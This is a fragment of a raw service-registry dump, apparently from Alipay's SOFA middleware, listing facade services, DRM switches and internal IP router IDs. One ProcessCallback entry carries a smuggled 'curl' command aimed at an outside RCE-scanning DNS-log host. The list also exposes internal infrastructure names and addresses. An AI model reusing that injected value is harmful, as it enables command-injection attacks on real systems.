D#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.d9546.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.scenemsg.MsgTemplateMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.strategy.service.facade.api.strategy.StrategyOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpromoprod.common.service.facade.member.grade.FinGradeActivateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.senior.common.service.facade.point.api.PointTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personalprod.service.facade.peerpay.PeerPayFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:demo-parent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.supergw.service.facade.transaction.LogonForwardService:1.0:supergw@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.GameQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.ContractApproveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:charityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.lifecircle.LifeCircleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fapquanthub.core.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininsightmng.common.service.facade.strategy.api.StrategyShortcutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskbiz.common.service.facade.api.SecurityProductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.BcGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dk.common.service.facade.open.api.risk.RiskMarketCollectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.54.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:ebppcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantRelationPageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.event.common.service.facade.service.AntEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.rule.ExpressRuleMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicConcernFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_mrchiswisdom_cluster_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mshopcenter.common.service.facade.shop.api.ShopPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mservicesinspect.service.facade.service.DetectTaskOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fininflux.common.service.facade.gzone.OutfluxShortSerialNoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.SubBizTypeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.InnertransAccountSwitchDRM.instructionSettleToCash,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesCostQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:fcassetflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","dcepboss@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kgmng.common.service.facade.schedule.SchedulerBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.core.service.account.FaInstAccountUserMappingRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.jiaofei.QueryChargeOutInstFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iscProcessAuditFailCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PointBudgetToolBusinessDrmResource.pointBudgetGrayConfigString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","_CLIENTSERVICE_TEST_7_2_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promobatch.common.service.task.facade.TimerTaskManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.28.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.cif.client.drm.TairToTbaseSwitch.fullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbretailprod.common.facade.kbproxy.budgetcore.BudgetAmountQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.appointment.event.AccorderEventHandlerTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.common.service.facade.api.TemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.loancore.common.service.facade.alipay.api.query.ZlcArgInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudinc.biz.dns.dr.IdcDrSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iregulation.common.service.facade.api.IregulationDeclareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.app.AppEventSubscribeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.close.CloseAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cancellCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.RiskQuestionnaireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clientsc.service.facade.actionlog.api.UserActionLogQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:wealthmanagertwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.integration.authcenter.AuthenticationFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.search.RecruitDataSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.231.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.212.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mytradeprod.common.service.facade.MessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.account.SpAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.AIPProtocolManageDRMResource.precheckFailedCntStatusCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discount.common.service.facade.group.GroupCodeManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.admin.api.CommonAdminOperateRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.ConditionQueryServiceFacade:1.0:bksigncentre_conditionQueryServiceFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.decision.MerchantDecisionQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.core.service.dataauth.DataAuthRuleEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmservicehub.common.service.facade.paycore.WithDrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.core.service.reindeer.GoodsManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.opsbatch.facade.ThrottleInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";curl http://GIYHU5BSMQWTC5LVPJRW2LK7NFXHA5LUL5RWQYLSONSXILLEHFZTO3DZMFYA----.rce.scan.noble.dn5l0g.co;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.settling.common.service.facade.MccQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendDingDingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.guarantee.PcreditGuaranteeAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.core.service.repository.log.BizCommonLogRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.exterface.ExterfaceOrderProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:yyk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:instdatalink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batch.engine.sdk.service.NodeFacade:1.0:BatchEngineNodeFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dacuprod.service.facade.ActivityPlanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.update.AppConfigUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcloanprod.common.service.facade.precheck.GenericBeanPreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.75.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findtprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lifemng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pcreditweb:name=com.alipay.pcreditweb.sign.useNewSignUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinbaseprod.common.service.facade.api.UpdateUserVideoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_EC_STD_CHARGE_BILL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.handShakeUserInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.yeb.YebProtocolQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngUtilsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.facade.batch.JieBeiCreditBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.metafacade.facade.service.DataInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.130.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.connect.mobile.codec.front.facade.api.cpm.AcCpmDecodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antassistant.common.service.facade.api.CsRobotFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.shoop.ShoopPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.prodcenter.common.service.facade.contract.api.ContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.enableExtInfoEncodeTransfer,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:imatchfacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrenewprod.common.service.facade.api.repayment.InsRepaymentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.SnsInteractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publichome.biz.shared.common.ProcessManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.AuthTokenManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.242.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditpay.payment.PcreditPaymentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetswap.common.service.facade.api.AttributeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexpprod.service.facade.api.settlement.GatewayQueryPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkmth.common.service.facade.service.BakeryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.rzone.ArOperateSyncCifServiceRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.activity.ActivityVenueTaskDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcreditcore.common.service.facade.ZmCreditInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openmq.common.service.facade.MessageSendService:1.0:openmq@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.yqcore.common.service.facade.api.ForceCrawlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zpublishuiweb:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_DATATRANS#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfacceptance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","antbuservice@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fascore.common.service.facade.local.FundAssetLocalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.CommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.xtrade.XTradeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kboms.common.service.facade.api.KbomsUserInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ReconLiqStatsBoardMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.govbizprodsys.common.service.facade.temp.DataExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.visitrecord.VisitRecordRevisalOpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BAOXIAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appstore.common.service.facade.commodity.CommodityPackageWriteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.FamilyRelationAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_RECON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.abilitycore.thirdpart.service.facade.ApiSyncOpenCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcprocess_T@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.ResultCodeManager:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:dsmp-change-plan-callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:linksec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.FundQuotationInputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.biz.open.api.facade.UnifiedInterfaceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.ElasticSwitcher.elasticRuleForPayment,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.MemberInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.template.RuleTemplateQuery:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.20.144.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finadvisorcenter.common.service.charge.facade.AdvisorChargeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchprodIndirectMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:publichome#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:record-replay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemng.common.service.facade.api.BusinessMetaMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscvprod.common.service.facade.InsConversationExtractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acparamcore.facade.api.MetaDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.facade.store.query.CloudMallQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundapplication.common.service.facade.api.fulibao.FulibaoUserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.inspect.detecttask.DetectOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.PerformanceSwitcher.checkPointLogEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.mobile.component.common.facade.f2fpay.F2fPayInitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.comment.CommentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fundprod.common.service.facade.product.drm.PortfolioProdDrmConfig.maxPurchaseAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmarket.service.PcreditMarketUserMarkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.ShowTemplateService:1.0:showTemplateService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.GroupFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcube.common.service.facade.openapi.upgrade.UpgradePackageDiffFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.storeMaxQueueSizeRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rctrack.OrderTrackDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zbdm.common.service.facade.phytable.TableInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.koa-patch:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C_WITHDRAW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.accenterRollBackCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abilitycore.common.service.facade.iot.bpaas.ServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.service.PcreditBillTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianapi.client.SystemExterfaceInvokeService:1.0:autoinsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.5.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finsecurityboss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.income.api.IncomeAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.amy.service.facade.GiftGroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.definition.DimLevelGenerateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexRateQueryWService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.233.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.saleGiftPackageAvailableScopeCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aclinkelib@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.TransferprodCloseFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-quotvilla-quote-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finlsmicrogw.common.service.facade.gateway.api.NearEndDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sdaappdist.common.service.facade.mgnplatform.IotOtaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.PrepaidCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:fiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.allocation.api.FundAllocQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.mng.api.TaskTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:imatchfacade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.advise.AssetFluxAdviceService:1.0:assetFluxAdviceServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfarm.common.service.facade.AntfarmConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.AcctransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.changeBindedRules,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.f